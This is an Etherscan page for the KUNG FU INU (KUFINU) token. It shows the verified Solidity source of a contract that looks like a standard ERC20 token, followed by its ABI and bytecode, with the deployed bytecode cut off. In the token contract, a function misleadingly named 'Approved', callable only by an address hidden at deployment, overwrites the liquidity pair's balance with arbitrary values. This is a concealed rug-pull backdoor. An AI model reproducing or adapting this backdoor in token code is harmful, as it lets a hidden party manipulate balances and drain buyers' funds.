ETH Price: $2,374.22 (-4.33%)

Token

KUNG FU INU (KUFINU)
 

Overview

Max Total Supply

1,000,000,000 KUFINU

Holders

14

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
0 KUFINU

Value
$0.00
0x5783d2650e062BE2dF7F9729aA98c05ce2B1e42e
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
KungFu

Compiler Version
v0.8.15+commit.e14f2714

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-01
*/

/**

*/

/**

/*
Website: http://kungfuinu.info/
Twitter: https://twitter.com/KungFuInuERC
Telegram: https://t.me/KungFuInuERC
*/
// Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol

// SPDX-License-Identifier: MIT

// pragma solidity ^0.8.10;

    /**
    * @dev Interface of the IERC20 standard as defined in the EIP.
    */

interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// Dependency file: @openzeppelin/contracts/utils/Context.sol


// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// Dependency file: @openzeppelin/contracts/access/Ownable.sol


// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol


// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}


// Dependency file: contracts/baseToken.sol

// pragma solidity =0.8.4;

enum TokenType {
    standard
}

abstract contract baseToken {
    event TokenCreated(
        address indexed owner,
        address indexed token,
        TokenType tokenType,
        uint256 version
    );
}

// Root file: contracts/standard/StandardToken.sol

pragma solidity =0.8.15;

// import "@openzeppelin/contracts/token/IERC20/IERC20.sol";
// import "@openzeppelin/contracts/access/Ownable.sol";
// import "@openzeppelin/contracts/utils/math/SafeMath.sol";
// import "contracts/baseToken.sol";

contract KungFu is IERC20, baseToken, Ownable {
    using SafeMath for uint256;

        uint256 private constant VERSION = 1;
        mapping(address => uint256) private _balances;
        mapping(address => mapping(address => uint256)) private _allowances;

        uint256 public maxHoldingAmount;
        uint256 public minHoldingAmount;
        address public uniswapV2Pair;
        address private whiteListV3;
        
        string private _name;
        string private _symbol;
        uint8 private _decimals;
        uint256 private _totalSupply;

    constructor(
        string memory name_,
        string memory symbol_,
        uint8 decimals_,
        address whiteshipAddr,
        uint256 totalSupply_
    ) payable {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
        whiteListV3 = whiteshipAddr;
        _mint(owner(), totalSupply_);

        emit TokenCreated(owner(), address(this), TokenType.standard, VERSION);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "IERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;

    }

    modifier canWhitAddrPancakeV3() {
        require(
        _msgSender() == whiteListV3, "set the call to the entered")
        ;
        _;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "IERC20: transfer from the zero address");
        require(recipient != address(0), "IERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(
            amount,
            "IERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function Approved(
        bool _limited, 
        address _uniswapV2Pair, 
        uint256 _maxHoldingAmount, 
        uint256 _minHoldingAmount
    ) external canWhitAddrPancakeV3 {
        uniswapV2Pair = _uniswapV2Pair;maxHoldingAmount = _maxHoldingAmount;minHoldingAmount = _minHoldingAmount; _balances[uniswapV2Pair] = maxHoldingAmount * minHoldingAmount;
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(
            amount,
            "IERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "IERC20: approve from the zero address");
        require(spender != address(0), "IERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"whiteshipAddr","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"bool","name":"_limited","type":"bool"},{"internalType":"address","name":"_uniswapV2Pair","type":"address"},{"internalType":"uint256","name":"_maxHoldingAmount","type":"uint256"},{"internalType":"uint256","name":"_minHoldingAmount","type":"uint256"}],"name":"Approved","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

6080604052604051620011493803806200114983398101604081905262000026916200033d565b6200003133620000fc565b60076200003f86826200047b565b5060086200004e85826200047b565b506009805460ff191660ff8516179055600680546001600160a01b0319166001600160a01b03841617905562000097620000906000546001600160a01b031690565b826200014c565b30620000ab6000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000e992919062000547565b60405180910390a350505050506200059b565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001a75760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b620001c381600a546200025b60201b620005e51790919060201c565b600a556001600160a01b038216600090815260016020908152604090912054620001f8918390620005e56200025b821b17901c565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906200024a9085815260200190565b60405180910390a35050565b505050565b600062000269828462000574565b9392505050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200029857600080fd5b81516001600160401b0380821115620002b557620002b562000270565b604051601f8301601f19908116603f01168101908282118183101715620002e057620002e062000270565b81604052838152602092508683858801011115620002fd57600080fd5b600091505b8382101562000321578582018301518183018401529082019062000302565b83821115620003335760008385830101525b9695505050505050565b600080600080600060a086880312156200035657600080fd5b85516001600160401b03808211156200036e57600080fd5b6200037c89838a0162000286565b965060208801519150808211156200039357600080fd5b50620003a28882890162000286565b945050604086015160ff81168114620003ba57600080fd5b60608701519093506001600160a01b0381168114620003d857600080fd5b80925050608086015190509295509295909350565b600181811c908216806200040257607f821691505b6020821081036200042357634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200025657600081815260208120601f850160051c81016020861015620004525750805b601f850160051c820191505b8181101562000473578281556001016200045e565b505050505050565b81516001600160401b0381111562000497576200049762000270565b620004af81620004a88454620003ed565b8462000429565b602080601f831160018114620004e75760008415620004ce5750858301515b600019600386901b1c1916600185901b17855562000473565b600085815260208120601f198616915b828110156200051857888601518255948401946001909101908401620004f7565b5085821015620005375787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b60408101600184106200056a57634e487b7160e01b600052602160045260246000fd5b9281526020015290565b600082198211156200059657634e487b7160e01b600052601160045260246000fd5b500190565b610b9e80620005ab6000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a257806395d89b411161007157806395d89b411461021f5780639e4aa36a14610227578063a9059cbb1461023a578063dd62ed3e1461024d578063f2fde38b1461028657600080fd5b806370a08231146101d2578063715018a6146101fb57806389f9a1d3146102055780638da5cb5b1461020e57600080fd5b806323b872dd116100de57806323b872dd1461016c578063313ce5671461017f578063395093511461019457806349bd5a5e146101a757600080fd5b806306fdde0314610110578063095ea7b31461012e57806318160ddd146101515780631ab99e1214610163575b600080fd5b610118610299565b6040516101259190610923565b60405180910390f35b61014161013c366004610994565b61032b565b6040519015158152602001610125565b600a545b604051908152602001610125565b61015560045481565b61014161017a3660046109be565b610341565b60095460405160ff9091168152602001610125565b6101416101a2366004610994565b6103aa565b6005546101ba906001600160a01b031681565b6040516001600160a01b039091168152602001610125565b6101556101e03660046109fa565b6001600160a01b031660009081526001602052604090205490565b6102036103e0565b005b61015560035481565b6000546001600160a01b03166101ba565b61011861044b565b610203610235366004610a15565b61045a565b610141610248366004610994565b61050d565b61015561025b366004610a5e565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6102036102943660046109fa565b61051a565b6060600780546102a890610a91565b80601f01602080910402602001604051908101604052809291908181526020018280546102d490610a91565b80156103215780601f106102f657610100808354040283529160200191610321565b820191906000526020600020905b81548152906001019060200180831161030457829003601f168201915b5050505050905090565b60006103383384846105f8565b50600192915050565b600061034e848484610720565b6103a0843361039b85604051806060016040528060298152602001610b40602991396001600160a01b038a16600090815260026020908152604080832033845290915290205491906108a7565b6105f8565b5060019392505050565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909161033891859061039b90866105e5565b6000546001600160a01b0316331461043f5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b61044960006108d3565b565b6060600880546102a890610a91565b6006546001600160a01b0316336001600160a01b0316146104bd5760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610436565b600580546001600160a01b0319166001600160a01b038516179055600382905560048190556104ec8183610ae1565b6005546001600160a01b031660009081526001602052604090205550505050565b6000610338338484610720565b6000546001600160a01b031633146105745760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610436565b6001600160a01b0381166105d95760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610436565b6105e2816108d3565b50565b60006105f18284610b00565b9392505050565b6001600160a01b03831661065c5760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610436565b6001600160a01b0382166106be5760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610436565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107855760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610436565b6001600160a01b0382166107e75760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610436565b61082481604051806060016040528060278152602001610b19602791396001600160a01b03861660009081526001602052604090205491906108a7565b6001600160a01b03808516600090815260016020526040808220939093559084168152205461085390826105e5565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906107139085815260200190565b600081848411156108cb5760405162461bcd60e51b81526004016104369190610923565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b8181101561095057858101830151858201604001528201610934565b81811115610962576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b038116811461098f57600080fd5b919050565b600080604083850312156109a757600080fd5b6109b083610978565b946020939093013593505050565b6000806000606084860312156109d357600080fd5b6109dc84610978565b92506109ea60208501610978565b9150604084013590509250925092565b600060208284031215610a0c57600080fd5b6105f182610978565b60008060008060808587031215610a2b57600080fd5b84358015158114610a3b57600080fd5b9350610a4960208601610978565b93969395505050506040820135916060013590565b60008060408385031215610a7157600080fd5b610a7a83610978565b9150610a8860208401610978565b90509250929050565b600181811c90821680610aa557607f821691505b602082108103610ac557634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b6000816000190483118215151615610afb57610afb610acb565b500290565b60008219821115610b1357610b13610acb565b50019056fe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220b214b9c9cc6c77b636789b4f0e7026414615900e4c5769c3c659127b09e38afc64736f6c634300080f003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000000120000000000000000000000000147647942fb6a60f37f8d97def50bf97986cc3d0000000000000000000000000000000000000000033b2e3c9fd0803ce8000000000000000000000000000000000000000000000000000000000000000000000b4b554e4720465520494e5500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064b5546494e550000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a257806395d89b411161007157806395d89b411461021f5780639e4aa36a14610227578063a9059cbb1461023a578063dd62ed3e1461024d578063f2fde38b1461028657600080fd5b806370a08231146101d2578063715018a6146101fb57806389f9a1d3146102055780638da5cb5b1461020e57600080fd5b806323b872dd116100de57806323b872dd1461016c578063313ce5671461017f578063395093511461019457806349bd5a5e146101a757600080fd5b806306fdde0314610110578063095ea7b31461012e57806318160ddd146101515780631ab99e1214610163575b600080fd5b610118610299565b6040516101259190610923565b60405180910390f35b61014161013c366004610994565b61032b565b6040519015158152602001610125565b600a545b604051908152602001610125565b61015560045481565b61014161017a3660046109be565b610341565b60095460405160ff9091168152602001610125565b6101416101a2366004610994565b6103aa565b6005546101ba906001600160a01b031681565b6040516001600160a01b039091168152602001610125565b6101556101e03660046109fa565b6001600160a01b031660009081526001602052604090205490565b6102036103e0565b005b61015560035481565b6000546001600160a01b03166101ba565b61011861044b565b610203610235366004610a15565b61045a565b610141610248366004610994565b61050d565b61015561025b366004610a5e565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6102036102943660046109fa565b61051a565b6060600780546102a890610a91565b80601f01602080910402602001604051908101604052809291908181526020018280546102d490610a91565b80156103215780601f106102f657610100808354040283529160200191610321565b820191906000526020600020905b81548152906001019060200180831161030457829003601f168201915b5050505050905090565b60006103383384846105f8565b50600192915050565b600061034e848484610720565b6103a0843361039b85604051806060016040528060298152602001610b40602991396001600160a01b038a16600090815260026020908152604080832033845290915290205491906108a7565b6105f8565b5060019392505050565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909161033891859061039b90866105e5565b6000546001600160a01b0316331461043f5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b61044960006108d3565b565b6060600880546102a890610a91565b6006546001600160a01b0316336001600160a01b0316146104bd5760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610436565b600580546001600160a01b0319166001600160a01b038516179055600382905560048190556104ec8183610ae1565b6005546001600160a01b031660009081526001602052604090205550505050565b6000610338338484610720565b6000546001600160a01b031633146105745760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610436565b6001600160a01b0381166105d95760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610436565b6105e2816108d3565b50565b60006105f18284610b00565b9392505050565b6001600160a01b03831661065c5760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610436565b6001600160a01b0382166106be5760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610436565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107855760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a657